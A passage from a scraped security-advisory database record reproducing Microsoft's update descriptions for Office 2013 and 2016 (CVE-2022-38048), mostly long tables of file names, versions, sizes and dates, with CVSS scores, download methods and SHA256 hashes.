powerpntlogosmall.contrast-white_scale-100.png| | 1022| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale140.png| powerpntlogosmall.contrast-white_scale-140.png| | 1307| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale180.png| powerpntlogosmall.contrast-white_scale-180.png| | 1874| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale80.png| powerpntlogosmall.contrast-white_scale-80.png| | 758| 14-Sep-22| 01:05 \npowerpntlogosmall.scale100.png| powerpntlogosmall.scale-100.png| | 1154| 14-Sep-22| 01:05 \npowerpntlogosmall.scale140.png| powerpntlogosmall.scale-140.png| | 1438| 14-Sep-22| 01:05 \npowerpntlogosmall.scale180.png| powerpntlogosmall.scale-180.png| | 1896| 14-Sep-22| 01:05 \npowerpntlogosmall.scale80.png| powerpntlogosmall.scale-80.png| | 874| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale100.png| spdesignlogo.contrast-black_scale-100.png| | 1559| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale140.png| spdesignlogo.contrast-black_scale-140.png| | 2383| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale180.png| spdesignlogo.contrast-black_scale-180.png| | 3497| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale80.png| spdesignlogo.contrast-black_scale-80.png| | 1298| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale100.png| spdesignlogo.contrast-white_scale-100.png| | 1548| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale140.png| spdesignlogo.contrast-white_scale-140.png| | 2534| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale180.png| spdesignlogo.contrast-white_scale-180.png| | 3725| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 14-Sep-22| 01:05 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 14-Sep-22| 01:05 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 14-Sep-22| 01:05 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 14-Sep-22| 01:05 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 14-Sep-22| 01:05 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 14-Sep-22| 01:05 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 14-Sep-22| 01:05 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 14-Sep-22| 01:05 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale140.png| visiologo.contrast-black_scale-140.png| | 3195| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 14-Sep-22| 01:05 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 14-Sep-22| 01:05 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 14-Sep-22| 01:05 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 14-Sep-22| 01:05 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 14-Sep-22| 01:05 \nvisiologosmall.scale100.png| visiologosmall.scale-100.png| | 1285| 14-Sep-22| 01:05 \nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 14-Sep-22| 01:05 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 14-Sep-22| 01:05 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 14-Sep-22| 01:05 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 14-Sep-22| 01:05 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 14-Sep-22| 01:05 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 14-Sep-22| 01:05 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale100.png| winprojlogosmall.contrast-white_scale-100.png| | 1119| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 14-Sep-22| 01:05 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 14-Sep-22| 01:05 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 14-Sep-22| 01:05 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 14-Sep-22| 01:05 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 14-Sep-22| 01:05 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 14-Sep-22| 01:05 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 14-Sep-22| 01:05 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 14-Sep-22| 01:05 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 14-Sep-22| 01:05 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 14-Sep-22| 01:05 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 14-Sep-22| 01:05 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 14-Sep-22| 01:05 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 14-Sep-22| 01:05 \nresources.pri| resources.pri| | 47040| 14-Sep-22| 01:05 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2013: October 11, 2022 (KB5002279)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002279", "href": "https://support.microsoft.com/en-us/help/5002279", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-13T10:51:43", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of Microsoft Office 2016 installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002288>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002288 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=588dcbf5-5171-408d-aa42-69f68c3d7293>)\n * [Download security update 5002288 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=a8407b0b-df5f-4378-9d52-b907eee42cf0>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [5002178](<https://support.microsoft.com/kb/5002178>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nmso2016-kb5002288-fullfile-x86-glb.exe| 97E7896D7817FC39F1EAA6FF13F4094CB96B16BE69FD2B0170610F0C05A0BCD1 \nmso2016-kb5002288-fullfile-x64-glb.exe| 769DC4095AA7C69EC8F7B8F84F238CE34AE20CD1B93836F52F81D39546C68563 \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### \n\n__\n\nFor all supported x86-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 16.0.5149.1000| 774440| 13-Sep-22| 06:01 \nmsointl.dll.x86.1025| msointl.dll| 16.0.4927.1000| 3287904| 14-Sep-22| 01:51 \nmsointl.dll.x86.1026| msointl.dll| 16.0.4927.1000| 1886048| 14-Sep-22| 01:51 \nmsointl.dll.x86.1027| msointl.dll| 16.0.4927.1000| 1817952| 14-Sep-22| 02:13 \nmsointl.dll.x86.1029| msointl.dll| 16.0.4927.1000| 1928032| 14-Sep-22| 01:51 \nmsointl.dll.x86.1030| msointl.dll| 16.0.4927.1000| 1758040| 14-Sep-22| 01:51 \nmsointl.dll.x86.1031| msointl.dll| 16.0.4927.1000| 1948216| 14-Sep-22| 01:51 \nmsointl.dll.x86.1032| msointl.dll| 16.0.4927.1000| 2057048| 14-Sep-22| 01:51 \nmsointl.dll.x86.3082| msointl.dll| 16.0.4927.1000| 1826360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1061| msointl.dll| 16.0.4927.1000| 1731664| 14-Sep-22| 01:52 \nmsointl.dll.x86.1069| msointl.dll| 16.0.4927.1000| 1740640| 14-Sep-22| 02:13 \nmsointl.dll.x86.1035| msointl.dll| 16.0.4927.1000| 1738504| 14-Sep-22| 01:52 \nmsointl.dll.x86.1036| msointl.dll| 16.0.4927.1000| 1975360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1110| msointl.dll| 16.0.4927.1000| 1774648| 14-Sep-22| 02:13 \nmsointl.dll.x86.1095| msointl.dll| 16.0.4927.1000| 1830688| 14-Sep-22| 02:13 \nmsointl.dll.x86.1037| msointl.dll| 16.0.4927.1000| 2907936| 14-Sep-22| 01:52 \nmsointl.dll.x86.1081| msointl.dll| 16.0.4927.1000| 1952312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1050| msointl.dll| 16.0.4927.1000| 1742088| 14-Sep-22| 01:52 \nmsointl.dll.x86.1038| msointl.dll| 16.0.4927.1000| 1951584| 14-Sep-22| 01:52 \nmsointl.dll.x86.1057| msointl.dll| 16.0.4927.1000| 1621848| 14-Sep-22| 01:52 \nmsointl.dll.x86.1040| msointl.dll| 16.0.4927.1000| 1766240| 14-Sep-22| 01:52 \nmsointl.dll.x86.1041| msointl.dll| 16.0.4927.1000| 2012512| 14-Sep-22| 01:51 \nmsointl.dll.x86.1087| msointl.dll| 16.0.4927.1000| 2103648| 14-Sep-22| 01:52 \nmsointl.dll.x86.1099| msointl.dll| 16.0.4927.1000| 1940320| 14-Sep-22| 02:14 \nmsointl.dll.x86.1042| msointl.dll| 16.0.4927.1000| 2768736| 14-Sep-22| 01:52 \nmsointl.dll.x86.1063| msointl.dll| 16.0.4927.1000| 1845808| 14-Sep-22| 01:52 \nmsointl.dll.x86.1062| msointl.dll| 16.0.4927.1000| 1832016| 14-Sep-22| 01:52 \nmsointl.dll.x86.1086| msointl.dll| 16.0.4927.1000| 1649232| 14-Sep-22| 01:52 \nmsointl.dll.x86.1044| msointl.dll| 16.0.4927.1000| 1721624| 14-Sep-22| 01:52 \nmsointl.dll.x86.1043| msointl.dll| 16.0.4927.1000| 1771264| 14-Sep-22| 01:52 \nmsointl.dll.x86.1045| msointl.dll| 16.0.4927.1000| 1917280| 14-Sep-22| 01:52 \nmsointl.dll.x86.1046| msointl.dll| 16.0.4927.1000| 1829656| 14-Sep-22| 01:52 \nmsointl.dll.x86.2070| msointl.dll| 16.0.4927.1000| 1836312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1048| msointl.dll| 16.0.4927.1000| 1963064| 14-Sep-22| 01:52 \nmsointl.dll.x86.1049| msointl.dll| 16.0.4927.1000| 1904384| 14-Sep-22| 01:52 \nmsointl.dll.x86.1051| msointl.dll| 16.0.4927.1000| 1971552| 14-Sep-22| 01:52 \nmsointl.dll.x86.1060| msointl.dll| 16.0.4927.1000| 1807712| 14-Sep-22| 01:52 \nmsointl.dll.x86.2074| msointl.dll| 16.0.4927.1000| 1765936| 14-Sep-22| 01:52 \nmsointl.dll.x86.9242| msointl.dll| 16.0.4927.1000| 1794912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1053| msointl.dll| 16.0.4927.1000| 1734912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1054| msointl.dll| 16.0.4927.1000| 1827376| 14-Sep-22| 01:52 \nmsointl.dll.x86.1055| msointl.dll| 16.0.4927.1000| 1998680| 14-Sep-22| 01:52 \nmsointl.dll.x86.1058| msointl.dll| 16.0.4927.1000| 1891896| 14-Sep-22| 01:52 \nmsointl.dll.x86.1066| msointl.dll| 16.0.4927.1000| 2005552| 14-Sep-22| 01:52 \nmsointl.dll.x86.2052| msointl.dll| 16.0.4927.1000| 2321704| 14-Sep-22| 01:52 \nmsointl.dll.x86.1028| msointl.dll| 16.0.4927.1000| 2329384| 14-Sep-22| 01:52 \nmsores.dll| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 06:01 \nmsores.dll.x86| msores.dll| 16.0.4795.1000| 81683304| 13-Sep-22| 05:57 \nmso.dll.x86| mso.dll| 16.0.5365.1000| 14426040| 15-Sep-22| 04:53 \nmsointl.dll.x86.1033| msointl.dll| 16.0.4927.1000| 1539640| 13-Sep-22| 05:54 \n \n#### \n\n__\n\nFor all supported x64-based versions of Office 2016\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 16.0.5149.1000| 816928| 13-Sep-22| 05:55 \nmsointl.dll.x64.1025| msointl.dll| 16.0.5365.1000| 3326904| 15-Sep-22| 05:24 \nmsointl.dll.x64.1026| msointl.dll| 16.0.5365.1000| 1912248| 15-Sep-22| 04:56 \nmsointl.dll.x64.1027| msointl.dll| 16.0.5365.1000| 1844112| 15-Sep-22| 05:15 \nmsointl.dll.x64.1029| msointl.dll| 16.0.5365.1000| 1954232| 15-Sep-22| 05:24 \nmsointl.dll.x64.1030| msointl.dll| 16.0.5365.1000| 1784208| 15-Sep-22| 05:24 \nmsointl.dll.x64.1031| msointl.dll| 16.0.5365.1000| 1974672| 15-Sep-22| 05:23 \nmsointl.dll.x64.1032| msointl.dll| 16.0.5365.1000| 2083728| 15-Sep-22| 05:24 \nmsointl.dll.x64.3082| msointl.dll| 16.0.5365.1000| 1852816| 15-Sep-22| 05:23 \nmsointl.dll.x64.1061| msointl.dll| 16.0.5365.1000| 1757624| 15-Sep-22| 04:56 \nmsointl.dll.x64.1069| msointl.dll| 16.0.5365.1000| 1766800| 15-Sep-22| 05:15 \nmsointl.dll.x64.1035| msointl.dll| 16.0.5365.1000| 1764752| 15-Sep-22| 05:24 \nmsointl.dll.x64.1036| msointl.dll| 16.0.5365.1000| 2001352| 15-Sep-22| 05:23 \nmsointl.dll.x64.1110| msointl.dll| 16.0.5365.1000| 1801128| 15-Sep-22| 05:16 \nmsointl.dll.x64.1095| msointl.dll| 16.0.5365.1000| 1856952| 15-Sep-22| 05:16 \nmsointl.dll.x64.1037| msointl.dll| 16.0.5365.1000| 2946936| 15-Sep-22| 05:24 \nmsointl.dll.x64.1081| msointl.dll| 16.0.5365.1000| 1978808| 15-Sep-22| 05:24 \nmsointl.dll.x64.1050| msointl.dll| 16.0.5365.1000| 1768360| 15-Sep-22| 05:24 \nmsointl.dll.x64.1038| msointl.dll| 16.0.5365.1000| 1977784| 15-Sep-22| 04:56 \nmsointl.dll.x64.1057| msointl.dll| 16.0.5365.1000| 1648056| 15-Sep-22| 04:56 \nmsointl.dll.x64.1040| msointl.dll| 16.0.5365.1000| 1792936| 15-Sep-22| 05:23 \nmsointl.dll.x64.1041| msointl.dll| 16.0.5365.1000| 2038712| 15-Sep-22| 05:23 \nmsointl.dll.x64.1087| msointl.dll| 16.0.5365.1000| 2130360| 15-Sep-22| 05:24 \nmsointl.dll.x64.1099| msointl.dll| 16.0.5365.1000| 1966520| 15-Sep-22| 05:16 \nmsointl.dll.x64.1042| msointl.dll| 16.0.5365.1000| 2795448| 15-Sep-22| 05:23 \nmsointl.dll.x64.1063| msointl.dll| 16.0.5365.1000| 1871800| 15-Sep-22| 05:24 \nmsointl.dll.x64.1062| msointl.dll| 16.0.5365.1000| 1857976| 15-Sep-22| 05:24 \nmsointl.dll.x64.1086| msointl.dll| 16.0.5365.1000| 1675704| 15-Sep-22| 04:56 \nmsointl.dll.x64.1044| msointl.dll| 16.0.5365.1000| 1747384| 15-Sep-22| 05:24 \nmsointl.dll.x64.1043| msointl.dll| 16.0.5365.1000| 1797560| 15-Sep-22| 05:24 \nmsointl.dll.x64.1045| msointl.dll| 16.0.5365.1000| 1943480| 15-Sep-22| 05:24 \nmsointl.dll.x64.1046| msointl.dll| 16.0.5365.1000| 1855928| 15-Sep-22| 05:24 \nmsointl.dll.x64.2070| msointl.dll| 16.0.5365.1000| 1862584| 15-Sep-22| 05:24 \nmsointl.dll.x64.1048| msointl.dll| 16.0.5365.1000| 1989048| 15-Sep-22| 05:24 \nmsointl.dll.x64.1049| msointl.dll| 16.0.5365.1000| 1930152| 15-Sep-22| 05:24 \nmsointl.dll.x64.1051| msointl.dll| 16.0.5365.1000| 1998264| 15-Sep-22| 04:56 \nmsointl.dll.x64.1060| msointl.dll| 16.0.5365.1000| 1834424| 15-Sep-22| 04:56 \nmsointl.dll.x64.2074| msointl.dll| 16.0.5365.1000| 1792440| 15-Sep-22| 05:24 \nmsointl.dll.x64.9242| msointl.dll| 16.0.5365.1000| 1821112| 15-Sep-22| 05:24 \nmsointl.dll.x64.1053| msointl.dll| 16.0.5365.1000| 1761208| 15-Sep-22| 05:24 \nmsointl.dll.x64.1054| msointl.dll| 16.0.5365.1000| 1853352| 15-Sep-22| 05:24 \nmsointl.dll.x64.1055| msointl.dll| 16.0.5365.1000| 2025400| 15-Sep-22| 05:24 \nmsointl.dll.x64.1058| msointl.dll| 16.0.5365.1000| 1917880| 15-Sep-22| 05:24 \nmsointl.dll.x64.1066| msointl.dll| 16.0.5365.1000| 2032056| 15-Sep-22| 04:56 \nmsointl.dll.x64.2052| msointl.dll| 16.0.5365.1000| 2348416| 15-Sep-22| 05:23 \nmsointl.dll.x64.1028| msointl.dll| 16.0.5365.1000| 2356096| 15-Sep-22| 05:23 \nmsointl.dll.x86.1025| msointl.dll| 16.0.4927.1000| 3287904| 14-Sep-22| 01:51 \nmsointl.dll.x86.1026| msointl.dll| 16.0.4927.1000| 1886048| 14-Sep-22| 01:51 \nmsointl.dll.x86.1029| msointl.dll| 16.0.4927.1000| 1928032| 14-Sep-22| 01:51 \nmsointl.dll.x86.1030| msointl.dll| 16.0.4927.1000| 1758040| 14-Sep-22| 01:51 \nmsointl.dll.x86.1031| msointl.dll| 16.0.4927.1000| 1948216| 14-Sep-22| 01:51 \nmsointl.dll.x86.1032| msointl.dll| 16.0.4927.1000| 2057048| 14-Sep-22| 01:51 \nmsointl.dll.x86.3082| msointl.dll| 16.0.4927.1000| 1826360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1061| msointl.dll| 16.0.4927.1000| 1731664| 14-Sep-22| 01:52 \nmsointl.dll.x86.1035| msointl.dll| 16.0.4927.1000| 1738504| 14-Sep-22| 01:52 \nmsointl.dll.x86.1036| msointl.dll| 16.0.4927.1000| 1975360| 14-Sep-22| 01:52 \nmsointl.dll.x86.1037| msointl.dll| 16.0.4927.1000| 2907936| 14-Sep-22| 01:52 \nmsointl.dll.x86.1081| msointl.dll| 16.0.4927.1000| 1952312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1050| msointl.dll| 16.0.4927.1000| 1742088| 14-Sep-22| 01:52 \nmsointl.dll.x86.1038| msointl.dll| 16.0.4927.1000| 1951584| 14-Sep-22| 01:52 \nmsointl.dll.x86.1057| msointl.dll| 16.0.4927.1000| 1621848| 14-Sep-22| 01:52 \nmsointl.dll.x86.1040| msointl.dll| 16.0.4927.1000| 1766240| 14-Sep-22| 01:52 \nmsointl.dll.x86.1041| msointl.dll| 16.0.4927.1000| 2012512| 14-Sep-22| 01:51 \nmsointl.dll.x86.1087| msointl.dll| 16.0.4927.1000| 2103648| 14-Sep-22| 01:52 \nmsointl.dll.x86.1042| msointl.dll| 16.0.4927.1000| 2768736| 14-Sep-22| 01:52 \nmsointl.dll.x86.1063| msointl.dll| 16.0.4927.1000| 1845808| 14-Sep-22| 01:52 \nmsointl.dll.x86.1062| msointl.dll| 16.0.4927.1000| 1832016| 14-Sep-22| 01:52 \nmsointl.dll.x86.1086| msointl.dll| 16.0.4927.1000| 1649232| 14-Sep-22| 01:52 \nmsointl.dll.x86.1044| msointl.dll| 16.0.4927.1000| 1721624| 14-Sep-22| 01:52 \nmsointl.dll.x86.1043| msointl.dll| 16.0.4927.1000| 1771264| 14-Sep-22| 01:52 \nmsointl.dll.x86.1045| msointl.dll| 16.0.4927.1000| 1917280| 14-Sep-22| 01:52 \nmsointl.dll.x86.1046| msointl.dll| 16.0.4927.1000| 1829656| 14-Sep-22| 01:52 \nmsointl.dll.x86.2070| msointl.dll| 16.0.4927.1000| 1836312| 14-Sep-22| 01:52 \nmsointl.dll.x86.1048| msointl.dll| 16.0.4927.1000| 1963064| 14-Sep-22| 01:52 \nmsointl.dll.x86.1049| msointl.dll| 16.0.4927.1000| 1904384| 14-Sep-22| 01:52 \nmsointl.dll.x86.1051| msointl.dll| 16.0.4927.1000| 1971552| 14-Sep-22| 01:52 \nmsointl.dll.x86.1060| msointl.dll| 16.0.4927.1000| 1807712| 14-Sep-22| 01:52 \nmsointl.dll.x86.2074| msointl.dll| 16.0.4927.1000| 1765936| 14-Sep-22| 01:52 \nmsointl.dll.x86.9242| msointl.dll| 16.0.4927.1000| 1794912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1053| msointl.dll| 16.0.4927.1000| 1734912| 14-Sep-22| 01:52 \nmsointl.dll.x86.1054| 